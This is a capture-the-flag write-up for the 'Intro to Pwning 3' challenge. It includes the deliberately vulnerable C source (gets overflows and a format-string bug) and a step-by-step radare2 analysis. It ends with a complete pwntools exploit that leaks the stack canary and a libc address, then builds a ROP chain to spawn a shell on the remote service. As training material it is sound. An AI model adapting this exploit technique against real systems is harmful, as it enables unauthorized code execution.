## Intro to Pwning 3

### Description

_**Category:** Pwn  
**Difficulty:** Baby  
**Author:** LiveOverflow  
**Dependencies: Intro to Pwning 2_  

_This is a introductory challenge for exploiting Linux binaries with memory
corruptions. Nowodays there are quite a few mitigations that make it not as
straight forward as it used to be. So in order to introduce players to pwnable
challenges, [LiveOverflow created a video walkthrough](https://www.youtube.com/watch?v=hhu7vhmuISY)
of the first challenge. An [alternative writeup](https://static.allesctf.net/Tutorial_Intro_Pwn.html)
can also be found by 0x4d5a. More resources can also be found
[here](https://github.com/LiveOverflow/pwn_docker_example)._

Service running at: `hax1.allesctf.net:9102`

**Files:**
* [intro_pwn.zip](../intro_pwn.zip)  
  - [pwn3](../pwn3)  
	  - [Dockerfile](Dockerfile)  
    - [flag](flag)  
    - [pwn3](pwn3)  
    - [pwn3.c](pwn3.c)  
    - [ynetd](ynetd)  

**pwn2.c:**
```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <string.h>

#ifndef PASSWORD
    #define PASSWORD "CSCG{FLAG_FROM_STAGE_2}"
#endif

// pwn3: gcc pwn3.c -o pwn3

// --------------------------------------------------- SETUP

void ignore_me_init_buffering() {
	setvbuf(stdout, NULL, _IONBF, 0);
	setvbuf(stdin, NULL, _IONBF, 0);
	setvbuf(stderr, NULL, _IONBF, 0);
}

void kill_on_timeout(int sig) {
  if (sig == SIGALRM) {
  	printf("[!] Anti DoS Signal. Patch me out for testing.");
    _exit(0);
  }
}

void ignore_me_init_signal() {
	signal(SIGALRM, kill_on_timeout);
	alarm(60);
}

// just a safe alternative to gets()
size_t read_input(int fd, char *buf, size_t size) {
  size_t i;
  for (i = 0; i < size-1; ++i) {
    char c;
    if (read(fd, &c, 1) <= 0) {
      _exit(0);
    }
    if (c == '\n') {
      break;
    }
    buf[i] = c;
  }
  buf[i] = '\0';
  return i;
}

// --------------------------------------------------- MENU

void WINgardium_leviosa() {
    printf("They has discovered our secret, Nagini.\n");
    printf("It makes us vulnerable.\n");
    printf("We must deploy all our forces now to find them.\n");
    // system("/bin/sh") it's not that easy anymore.
}

void check_password_stage2() {
    char read_buf[0xff];
    printf("Enter the password of stage 2:\n");
    memset(read_buf, 0, sizeof(read_buf));
    read_input(0, read_buf, sizeof(read_buf));
    if(strcmp(read_buf, PASSWORD) != 0) {
        printf("-10 Points for Gryffindor!\n");
        _exit(0);
    } else {
        printf("+10 Points for Gryffindor!");
    }
}

void welcome() {
    char read_buf[0xff];
    printf("Enter your witch name:\n");
    gets(read_buf);
    printf("┌───────────────────────┐\n");
    printf("│ You are a Gryffindor! │\n");
    printf("└───────────────────────┘\n");
    printf(read_buf);
}

void AAAAAAAA() {
    char read_buf[0xff];
    
    printf(" enter your magic spell:\n");
    gets(read_buf);
    if(strcmp(read_buf, "Expelliarmus") == 0) {
        printf("~ Protego!\n");
    } else {
        printf("-10 Points for Gryffindor!\n");
        _exit(0);
    }
}

// --------------------------------------------------- MAIN

void main(int argc, char* argv[]) {
	  ignore_me_init_buffering();
	  ignore_me_init_signal();

    check_password_stage2();

    welcome();
    AAAAAAAA();	
}
```

---

### Solution

Running `checksec` we see that all standard mitigations are still enabled:

```
$ checksec pwn2
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

```

The only thing that is changed is in `pwn3` is that the `WINguardium_leviosia`
function no longer spawns a shell, so my guess is that we can leak an
address from `libc`, calculate the address of `system` and call it with the
string `"/bin/bash"` that we put somewhere on the stack.

Let's inspect the stack and find the address of the stack canary.
After analyzing the binary, disasemble `welcome` with `pdf @ sym.welcome` and
set a breakpoint just before the call to `printf` (in this case the address is
`0x55d7e4b2047b`) with `db 0x55d7e4b2047b`, and continue execution with `dc`.

Printing the stack with `pxq 0x300 @ rsp` we get:

![images/stack.png](images/stack.png)

The stack canary for `welcome` is at address `rbp-0x8`, we can print it with
`pxq 8 @ rbp-0x8` and see that it is `0x17adde0827181e00`, we also see it on
the stack which means we leak it and use it to override the original stack
canary with the same value.

In `AAAAAAAA` we send `"Expelliarmus\x00"` to ind in the right branch of the
if-statement followed by a De Bruijn pattern. If we run the program again and
set a breakpoint at the comparison of the original canary and the canary on
the stack, we can find the offset.

So now we can overwrite the stack canary and therefore the return address that
comes after unnoticed. So far our last payload for the `gets` function in
`AAAAAAAA` looks like (using `pwntools`):

```
"Expelliarmus\x00" + CANARY_OFFSET + p64(CANARY)
```

The plan is to override the return address with:

* Address of `pop rdi` instruction
* Stack address with value "/bin/bash"
* Address of `system`

Let's assume that `pwn3` uses the same version of glibc as `pwn2`. We can find
the version by running the command `ldd --version` in the remote shell of
`pwn2`, which gives us the version:

```
ldd (Ubuntu GLIBC 2.30-0ubuntu2) 2.30
```

Install the same version with (using Ubuntu):

```
apt-get install libc-bin=2.30-0ubuntu2
```

We can check what address space `libc` is mapped to with `dm` and if we look
at the stack again, we can see that the address `0x00007f00b54ec1e3` is an
address in `libc` which we can leak. Now we need to find the addresses of the
following in `libc`:

* Address of `system`
* `"/bin/sh"` string
* `pop rdi; ret` gadget

We can find the address of `system` with `dmi libc system`.
To find the `"/bin/sh"` string we first tell radare to search in all memory maps
with `e search.in=dbg.maps` and search with `/ /bin/sh`.
We can use `ropper` to find the `pop rdi; ret` gadget that we need:

```
ropper -f /libc_databse/db/libc6_2.30-0ubuntu2_amd64.so --search "pop rdi; ret
```

I'm using the `libc_database`.

Now we just have to calculate the offsets with respect to the `libc` refference
that we can leak from the stack, and align the stack pointer by writing a `ret`
instruction address to the stack.

We end up with the following exploit:

```python
from pwn import *

#STAGE_2_PASS = "CSCG{THIS_IS_TEST_FLAG}"
STAGE_2_PASS = "CSCG{NOW_GET_VOLDEMORT}"
FORMATSTRING = "|".join(["%p" for _ in range(46)])

#conn = process("./pwn3")
conn = remote("hax1.allesctf.net", 9102)

conn.recvuntil("Enter the password of stage 2:")

#raw_input("attach to {}".format(str(conn.proc.pid)))
conn.sendline(STAGE_2_PASS)
conn.recvuntil("Enter your witch name:")
conn.sendline(FORMATSTRING)
LEAK = conn.recvuntil("enter your magic spell:").split("|")

CANARY = int(LEAK[-8], 16)
LIBC_REF = int(LEAK[-2], 16)

BIN_BASH_ADDR = LIBC_REF + 0x18f430
POP_RDI_RET = LIBC_REF - 0x631
RET = POP_RDI_RET + 1
LIBC_SYSTEM = LIBC_REF + 0x2e2fd

CANARY_OFFSET = "A"*cyclic_find("cnaa")
RET_OFFSET = "B"*cyclic_find("caaa")

conn.sendline("Expelliarmus\x00" + CANARY_OFFSET + p64(CANARY) +\
               RET_OFFSET + p64(RET) + p64(POP_RDI_RET) +\
               p64(BIN_BASH_ADDR)  + p64(LIBC_SYSTEM))

conn.interactive()
```

CSCG{VOLDEMORT_DID_NOTHING_WRONG}
